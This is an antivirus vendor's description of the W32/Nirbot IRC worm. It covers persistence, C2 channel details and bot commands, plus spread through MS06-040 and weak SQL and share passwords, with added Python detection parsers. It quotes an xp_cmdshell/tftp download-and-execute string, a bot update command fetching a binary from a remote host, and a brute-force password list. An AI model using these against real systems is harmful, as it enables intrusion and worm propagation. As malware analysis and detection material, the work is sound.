W32/Nirbot.worm

Type: Internet Worm
SubType: Internet Relay Chat
Discovery Date: 03/09/2007
Length: 210,944 bytes
Minimum DAT: 4981 (03/09/2007)
Updated DAT: 5296 (05/15/2008)
Minimum Engine: 5.1.00
Description Added: 03/09/2007
Description Modified: 04/16/2007 2:43 PM (PT)

Risk Assessment
Corporate User: Low-Profiled
Home User: Low-Profiled

Characteristics

--- Updated March 9th, 2007:
W32/Nirbot.worm has been deemed Low-Profiled due to media attention at http://www.baltimoresun.com/news/local/annearundel/bal-virus0308,0,2491750.story?coll=bal-local-arundel
--

W32/Nirbot.worm is an IRC-controlled backdoor that provides an attacker with unauthorized remote access to the compromised computer. An attacker can take control of the compromised computer and use it to send spam, install adware or launch a DDoS attack against Internet systems. W32/Nirbot is written in C++ and is typically packed with EXECrypter.

Upon execution, it creates a copy of itself into the Windows system directory:

%Windir%\%SYSDIR%\zlclint.exe

Adds the following value to the registry to auto-start itself when Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"zone alarm security" = "%Windir%\%SYSDIR%\zlclint.exe"

Checks if a debugger is present on the system and quits executing if present. This is done to prevent researchers from debugging the worm.

Creates the following mutexes to ensure that only one instance of the worm can run on a computer at any time.

  • p3n1z
  • DBWinMutex

W32/Nirbot.worm attempts to join the following IRC server and waits for instructions.

  • IRC Server: 69.181.7.xxx
  • Channel: ##CO hellovalsmit
  • Port: 8080
  • Nickname = [2K|USA|P|00|random]

where Nickname = [2K|USA|P|00|random] denotes:

  • 2K/USA --> information about the OS and client locale.
  • P --> indicates the client IP address is private.
  • 00 --> client uptime in days.
  • random --> used to avoid name collisions in the chat room.

Once the bot connects to the IRC server, a remote attacker can use it to scan for vulnerable machines on the network. If the attack on a vulnerable computer is successful, the bot issues TFTP commands on that computer to download and execute a copy of itself from the attacking machine.

Symptoms

The following tasks can be performed using this bot.

  • Gather system information (CPU, RAM, OS Version, IP address, UserName, Uptime)
  • Scan network for machines to infect.
  • Launch a TFTP, HTTP server and SOCKS4 proxy.
  • Download and Execute files.
  • Update bot.
  • Uninstall bot.

A simulation of an attacker controlling the bot is shown below.



At the time of joining the attacker's channel, the following commands were set as the channel topic.

.scan.start NETAPI x.x.x.x 60 -s

The above channel topic directs the bot to perform the following functions:

.scan.start – bot command to scan for vulnerable systems
NETAPI – attempt to exploit vulnerable hosts using the MS06-040 exploit
x.x.x.x – tells the bot to scan all IP address classes
60 – the number of concurrent threads
-s – the scan is silent and does not report its findings back to the channel

.update http://www.jimmybuttons.[Removed]/mbp.exe C:\dsdv.exe -s

where

.update – bot command to download a remote file
-s – the install is silent

The second command instructs the bot to download a binary from a remote web server, save it as "C:\dsdv.exe" and execute it. The file "mbp.exe" being downloaded is a newer version of the bot; updating in this way keeps the bot undetected in the wild for an extended period.

Note: As the website being contacted is normally controlled by the malware author, any file being downloaded can be modified remotely and the behavior of the new binaries altered, possibly with every new infection.
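As an added illustration (not part of the original description), the following Python decodes the nickname format and the channel-topic commands documented above from constructed IRC sensor lines, so that a responder can pick bot-style nicks and C2 instructions out of a capture. The sample lines, the "<nick> <verb> <rest>" record shape and the C2 URL are constructed assumptions.

```python
import re

# Nick format documented for this bot: [OS|locale|P|uptime_days|random].
# Only "P" (private IP) is documented for field 3; accepting any letter there is an assumption.
NICK_RE = re.compile(r"^\[(?P<os>[0-9A-Za-z]+)\|(?P<locale>[A-Z]{2,3})\|(?P<addr>[A-Z])\|(?P<uptime>\d+)\|(?P<rand>\w+)\]$")
# Channel-topic commands in the shape shown on this page.
SCAN_RE = re.compile(r"^\.scan\.start\s+(?P<exploit>\S+)\s+(?P<range>\S+)\s+(?P<threads>\d+)(?P<flags>(?:\s+-\S+)*)$")
UPDATE_RE = re.compile(r"^\.update\s+(?P<url>\S+)\s+(?P<dest>\S+)(?P<flags>(?:\s+-\S+)*)$")

def parse_nick(nick):
    m = NICK_RE.match(nick)
    if not m:
        return None
    return {"os": m["os"], "locale": m["locale"], "private_ip": m["addr"] == "P",
            "uptime_days": int(m["uptime"]), "random": m["rand"]}

def parse_topic(topic):
    m = SCAN_RE.match(topic)
    if m:
        return {"cmd": "scan", "exploit": m["exploit"], "range": m["range"],
                "threads": int(m["threads"]), "silent": "-s" in m["flags"].split()}
    m = UPDATE_RE.match(topic)
    if m:
        return {"cmd": "update", "url": m["url"], "dest": m["dest"],
                "silent": "-s" in m["flags"].split()}
    return None

# Constructed IRC sensor lines ("<nick> <verb> <rest>"), not a real capture.
SAMPLE_LOG = """\
[2K|USA|P|00|a8f3] JOIN ##CO hellovalsmit
ChanServ TOPIC ##CO hellovalsmit :.scan.start NETAPI x.x.x.x 60 -s
alice JOIN #help
[XP|DEU|P|03|k9q1] JOIN ##CO hellovalsmit
ChanServ TOPIC ##CO hellovalsmit :.update http://c2.example.invalid/mbp.exe C:\\dsdv.exe -s
"""

def triage(log_text):
    """Return (bot-style nicks with decoded fields, decoded topic commands)."""
    bots, commands = [], []
    for line in log_text.splitlines():
        nick, _, rest = line.partition(" ")
        info = parse_nick(nick)
        if info:
            bots.append((nick, info))
        if rest.startswith("TOPIC ") and ":" in rest:
            cmd = parse_topic(rest.split(":", 1)[1])
            if cmd:
                commands.append(cmd)
    return bots, commands
```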

Method of Infection

W32/Nirbot.worm scans for vulnerable machines on the network and uses the following vulnerabilities to spread.

  • Weak password exploitation of MS SQL servers.

The bot scans for computers with an exposed port 1433 (the default MS SQL Server port) and attempts to open an SQL connection to that port. It tries to log on with the following username and password combinations:

1234
2000
2001
2002
2003
2004
12345
123456
1234567
12345678
123456789
1234567890
access
accounting
accounts
admin
administrador
administrat
administrateur
administrator
admins
backup
bill
bitch
blank
brian
changeme
chris
cisco
compaq
control
data
database
databasepass
databasepassword
db1234
dbpass
dbpassword
default
dell
demo
domain
domainpass
domainpassword
eric
exchange
fred
fuck
george
guest
hell
hello
home
homeuser
internet
internet
intranet
john
kate
katie
linux
login
loginpass
luke
mail
main
mary
mike
neil
nokia
none
null
oeminstall
oemuser
office
oracle
orainstall
outlook
pass
pass1234
passwd
password
password1
peter
peter
qwerty
root
server
siemens
slut
sqlpassoainstall
staff
student
susan
system
teacher
technical
test
unix
user
win2000
win2k
win98
windows
winnt
winpass
winxp

If authentication succeeds and the compromised SQL account has sufficient rights, the bot runs the following connection string and query; the query calls xp_cmdshell to invoke "tftp.exe", which downloads and executes a copy of the bot:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

  • Weak password exploitation of network shares.

The bot also attempts to spread by finding improperly secured NetBIOS shares. It attempts to connect to computers with shared drives and tries the password combinations listed above.
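Added detection example (not from the original description): Python that inspects SQL Server audit records for the xp_cmdshell/tftp propagation pattern shown above and flags statements whose TFTP source is the connecting client itself, which is how this worm pulls its copy from the attacking machine. The audit record shape (login, client address, statement text) and all addresses are constructed.

```python
import re

# Derived from the propagation string on this page:
#   EXEC master..xp_cmdshell 'tftp -i <host> GET irn.exe&start irn.exe&exit
XP_CMDSHELL_RE = re.compile(r"xp_cmdshell\s*'?(?P<cmd>[^']*)", re.IGNORECASE)
TFTP_RE = re.compile(r"\btftp\b[^&]*?\s(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+GET\s+(?P<file>[^\s&']+)",
                     re.IGNORECASE)

def analyse_statement(sql, client_ip=None):
    """Return a finding dict for an xp_cmdshell statement, or None when clean."""
    m = XP_CMDSHELL_RE.search(sql)
    if not m:
        return None
    cmd = m["cmd"]
    finding = {"tftp_host": None, "file": None, "chained": "&" in cmd,
               "pulls_from_client": False}
    t = TFTP_RE.search(cmd)
    if t:
        finding["tftp_host"] = t["host"]
        finding["file"] = t["file"]
        # The worm fetches its copy from the attacking machine, i.e. the SQL client itself.
        finding["pulls_from_client"] = t["host"] == client_ip
    return finding

# Constructed audit records (login, client address, statement text); not real data.
SAMPLE_AUDIT = [
    ("sa", "10.0.0.5", "SELECT name FROM sys.databases"),
    ("sa", "10.0.0.77", "EXEC master..xp_cmdshell 'tftp -i 10.0.0.77 GET irn.exe&start irn.exe&exit'"),
    ("reports", "10.0.0.9", "EXEC master..xp_cmdshell 'dir C:\\'"),
]

def triage_audit(records):
    """List every xp_cmdshell use as (login, client, finding), worm-style hits first."""
    hits = []
    for login, client, sql in records:
        f = analyse_statement(sql, client)
        if f:
            hits.append((login, client, f))
    hits.sort(key=lambda h: (not h[2]["pulls_from_client"], h[2]["tftp_host"] is None))
    return hits
```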

Removal

A combination of the latest DATs and the Engine will detect and remove this threat. AVERT recommends that users not trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users share files.

Variants

N/A

Overview

-- Update April 16, 2007 --

A new variant in this family has been discovered which appears to exploit CVE-2007-1748.  We will add more details to this description as they are available.


There are multiple versions of the W32/Nirbot family of worms that use IRC (Internet Relay Chat) as a command and control mechanism. Such worms typically use exploits and weak passwords to spread to vulnerable machines on the network.

Aliases

  • Backdoor.Vanbot.Gen!Pac (VirusBuster)
  • Backdoor.Win32.VanBot.bj (Kaspersky)
  • BDS/VanBot.BJ (Avira)
  • W32.Rinbot!gen (Symantec)
  • W32/Delbot-S (Sophos)
  • W32/Rinbot.H!tr (Fortinet)
  • W32/Rinbot.H.worm (Panda)
  • WORM_RINBOT.T (Trend Micro)
